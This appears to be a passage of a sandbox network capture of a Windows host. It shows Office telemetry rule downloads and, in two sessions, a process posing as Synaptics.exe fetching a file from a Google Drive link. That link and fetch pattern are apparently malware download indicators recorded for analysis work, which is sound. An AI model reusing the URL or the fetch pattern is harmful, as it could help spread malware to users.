                                                                                        2024-12-05 21:50:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        64192.168.2.54983413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:37 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:38 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                        x-ms-request-id: 884a34ff-001e-00a2-15a2-46d4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215037Z-1746fd949bdjzh7thC1EWR3g6400000003c0000000008xxa
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:38 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.2.54984013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:38 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:38 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 425
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                        x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215038Z-1746fd949bdnq7x2hC1EWRpxr0000000036g000000004bh7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:38 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.2.54984113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:38 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                        x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215038Z-1746fd949bdmv56chC1EWRypnn00000003eg00000000cku0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        67192.168.2.54984313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:38 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 491
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B98B88612"
                                                                                        x-ms-request-id: 17f2aa49-701e-005c-61a3-46bb94000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215039Z-1746fd949bddgsvjhC1EWRum2c00000003gg00000000p81x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.2.54984213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:38 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 448
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                        x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215039Z-1746fd949bdjzh7thC1EWR3g6400000003a000000000hpne
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        69192.168.2.549844172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:39 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1VEgma0PmTbDz1B1YwTdfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        70192.168.2.549845172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:39 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-D9gurwwALbIEpkQMKKQuSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        71192.168.2.54984713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:39 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:40 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                        x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215040Z-1746fd949bdwt8wrhC1EWRu6rg00000003fg0000000093nt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        72192.168.2.54985013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:40 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                        x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215040Z-1746fd949bd9x4mhhC1EWRb76n000000039g00000000ndm0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        73192.168.2.54985113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:40 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bdxk6n6hC1EWRdr8c000000037g0000000016vn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        74192.168.2.54985213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:41 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                        x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bdtlp5chC1EWRq1v400000003a0000000005a0q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
